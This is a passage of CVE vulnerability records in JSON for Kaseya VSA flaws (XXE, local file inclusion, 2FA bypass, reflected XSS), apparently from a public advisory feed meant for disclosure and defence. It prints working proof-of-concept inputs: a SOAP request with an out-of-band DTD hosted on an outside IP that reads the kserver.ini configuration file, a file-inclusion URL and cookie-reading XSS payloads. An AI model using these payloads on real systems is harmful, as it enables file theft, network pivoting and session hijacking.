"url": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://www.kaseya.com/products/vsa/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-276"
},
{
"lang": "en",
"value": "CWE-287"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
CVE-2021-30201 (GCVE-0-2021-30201)
Vulnerability from cvelistv5 – Published: 2021-07-09 13:25 – Updated: 2024-08-03 22:24
VLAI?
Summary
The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"> <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---> There is an error in XML document (24, -1000).\r\n\r\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.
Severity ?
7.5 (High)
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Credits
Discovered by Wietse Boonstra of DIVD
Additional research by Frank Breedijk of DIVD
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T22:24:59.560Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/CVE-2021-30201"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "en",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"descriptions": [
{
"lang": "en",
"value": "The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 \u003csoapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:kas=\"KaseyaWS\"\u003e \u003csoapenv:Header/\u003e \u003csoapenv:Body\u003e \u003ckas:PrimitiveResetPassword\u003e \u003c!--type: string--\u003e \u003ckas:XmlRequest\u003e\u003c![CDATA[\u003c!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob.dtd\"\u003e\u003cdata\u003e\u0026send;\u003c/data\u003e]]\u003e \u003c/kas:XmlRequest\u003e \u003c/kas:PrimitiveResetPassword\u003e \u003c/soapenv:Body\u003e \u003c/soapenv:Envelope\u003e ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` \u003c!ENTITY % file SYSTEM \"file://c:\\\\kaseya\\\\kserver\\\\kserver.ini\"\u003e \u003c!ENTITY % eval \"\u003c!ENTITY \u0026#x25; error SYSTEM \u0027file:///nonexistent/%file;\u0027\u003e\"\u003e %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\\\kaseya\\\\kserver\\\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 \u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\u003csoap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\u003e\u003csoap:Body\u003e\u003csoap:Fault\u003e\u003cfaultcode\u003esoap:Server\u003c/faultcode\u003e\u003cfaultstring\u003eServer was unable to process request. ---\u0026gt; There is an error in XML document (24, -1000).\\r\\n\\r\\nSystem.Xml.XmlException: Fragment identifier \u0027######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## \u003csnip\u003e ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-04-04T06:25:20",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/CVE-2021-30201"
}
],
"solutions": [
{
"lang": "en",
"value": "Upgrade to version 9.5.6 or higher"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
},
"title": "Unauthenticated XML External Entity vulnerability in Kaseya VSA \u003c v9.5.6",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-30201",
"STATE": "PUBLIC",
"TITLE": "Unauthenticated XML External Entity vulnerability in Kaseya VSA \u003c v9.5.6"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 \u003csoapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:kas=\"KaseyaWS\"\u003e \u003csoapenv:Header/\u003e \u003csoapenv:Body\u003e \u003ckas:PrimitiveResetPassword\u003e \u003c!--type: string--\u003e \u003ckas:XmlRequest\u003e\u003c![CDATA[\u003c!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob.dtd\"\u003e\u003cdata\u003e\u0026send;\u003c/data\u003e]]\u003e \u003c/kas:XmlRequest\u003e \u003c/kas:PrimitiveResetPassword\u003e \u003c/soapenv:Body\u003e \u003c/soapenv:Envelope\u003e ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` \u003c!ENTITY % file SYSTEM \"file://c:\\\\kaseya\\\\kserver\\\\kserver.ini\"\u003e \u003c!ENTITY % eval \"\u003c!ENTITY \u0026#x25; error SYSTEM \u0027file:///nonexistent/%file;\u0027\u003e\"\u003e %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\\\kaseya\\\\kserver\\\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 \u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\u003csoap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\u003e\u003csoap:Body\u003e\u003csoap:Fault\u003e\u003cfaultcode\u003esoap:Server\u003c/faultcode\u003e\u003cfaultstring\u003eServer was unable to process request. ---\u0026gt; There is an error in XML document (24, -1000).\\r\\n\\r\\nSystem.Xml.XmlException: Fragment identifier \u0027######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## \u003csnip\u003e ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"name": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021",
"refsource": "CONFIRM",
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
},
{
"name": "https://csirt.divd.nl/DIVD-2021-00011",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"name": "https://csirt.divd.nl/CVE-2021-30201",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/CVE-2021-30201"
}
]
},
"solution": [
{
"lang": "en",
"value": "Upgrade to version 9.5.6 or higher"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-30201",
"datePublished": "2021-07-09T13:25:37",
"dateReserved": "2021-04-07T00:00:00",
"dateUpdated": "2024-08-03T22:24:59.560Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-30121 (GCVE-0-2021-30121)
Vulnerability from cvelistv5 – Published: 2021-07-09 13:24 – Updated: 2024-08-03 22:24
VLAI?
Summary
Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\Kaseya\WebPages\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118
Severity ?
6.5 (Medium)
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Credits
Discovered by Wietse Boonstra of DIVD
Additional research by Frank Breedijk of DIVD
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T22:24:59.547Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/CVE-2021-30121"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "en",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"descriptions": [
{
"lang": "en",
"value": "Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\\Kaseya\\WebPages\\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-04-04T06:25:19",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/CVE-2021-30121"
}
],
"solutions": [
{
"lang": "en",
"value": "Upgrade to a version above 9.5.6"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
},
"title": "(Semi-)Authenticated local file inclusion in Kaseya VSA \u003c v9.5.6",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-30121",
"STATE": "PUBLIC",
"TITLE": "(Semi-)Authenticated local file inclusion in Kaseya VSA \u003c v9.5.6"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\\Kaseya\\WebPages\\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118"
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"name": "https://csirt.divd.nl/DIVD-2021-00011",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"name": "https://csirt.divd.nl/CVE-2021-30121",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/CVE-2021-30121"
}
]
},
"solution": [
{
"lang": "en",
"value": "Upgrade to a version above 9.5.6"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-30121",
"datePublished": "2021-07-09T13:24:28",
"dateReserved": "2021-04-02T00:00:00",
"dateUpdated": "2024-08-03T22:24:59.547Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-30120 (GCVE-0-2021-30120)
Vulnerability from cvelistv5 – Published: 2021-07-09 13:22 – Updated: 2024-08-03 22:24
VLAI?
Summary
Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication in enforce client-side instead of server-side and can be bypassed using a local proxy. Thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequered from True to False, there is no prompt for the second factor, but the user is still logged in.
Severity ?
9.9 (Critical)
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Credits
Discovered by Wietse Boonstra of DIVD
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T22:24:59.669Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csrit.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csrit.divd.nl/CVE-2021-30120"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Discovered by Wietse Boonstra of DIVD"
}
],
"descriptions": [
{
"lang": "en",
"value": "Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication in enforce client-side instead of server-side and can be bypassed using a local proxy. Thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequered from True to False, there is no prompt for the second factor, but the user is still logged in."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-04-04T06:25:18",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csrit.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csrit.divd.nl/CVE-2021-30120"
}
],
"solutions": [
{
"lang": "en",
"value": "Upgrade to a version above 9.5.6"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
},
"title": "2FA bypass in Kaseya VSA \u003c= v9.5.6",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-30120",
"STATE": "PUBLIC",
"TITLE": "2FA bypass in Kaseya VSA \u003c= v9.5.6"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra of DIVD"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication in enforce client-side instead of server-side and can be bypassed using a local proxy. Thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequered from True to False, there is no prompt for the second factor, but the user is still logged in."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"name": "https://csrit.divd.nl/DIVD-2021-00011",
"refsource": "CONFIRM",
"url": "https://csrit.divd.nl/DIVD-2021-00011"
},
{
"name": "https://csrit.divd.nl/CVE-2021-30120",
"refsource": "CONFIRM",
"url": "https://csrit.divd.nl/CVE-2021-30120"
}
]
},
"solution": [
{
"lang": "en",
"value": "Upgrade to a version above 9.5.6"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-30120",
"datePublished": "2021-07-09T13:22:17",
"dateReserved": "2021-04-02T00:00:00",
"dateUpdated": "2024-08-03T22:24:59.669Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-30119 (GCVE-0-2021-30119)
Vulnerability from cvelistv5 – Published: 2021-07-09 13:20 – Updated: 2024-08-03 22:24
VLAI?
Summary
Authenticated reflective XSS in HelpDeskTab/rcResults.asp The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=<script>alert(document.cookie)</script>` The same is true for the parameter FileName of /done.asp Eaxmple request: `https://x.x.x.x/done.asp?FileName=";</script><script>alert(1);a="&PathData=&originalName=shell.aspx&FileSize=4388&TimeElapsed=00:00:00.078`
Severity ?
5.4 (Medium)
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Credits
Discovered by Wietse Boonstra of DIVD
Additional research by Frank Breedijk and Hidde Smit of DIVD
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T22:24:59.199Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/CVE-2021-30119"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "en",
"value": "Additional research by Frank Breedijk and Hidde Smit of DIVD"
}
],
"descriptions": [
{
"lang": "en",
"value": "Authenticated reflective XSS in HelpDeskTab/rcResults.asp The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e` The same is true for the parameter FileName of /done.asp Eaxmple request: `https://x.x.x.x/done.asp?FileName=\";\u003c/script\u003e\u003cscript\u003ealert(1);a=\"\u0026PathData=\u0026originalName=shell.aspx\u0026FileSize=4388\u0026TimeElapsed=00:00:00.078`"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-04-04T06:25:17",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/CVE-2021-30119"
}
],
"solutions": [
{
"lang": "en",
"value": "Upgrade to a version above 9.5.6"
}
],
"source": {
"advisory": "DIVD-2021-00011",
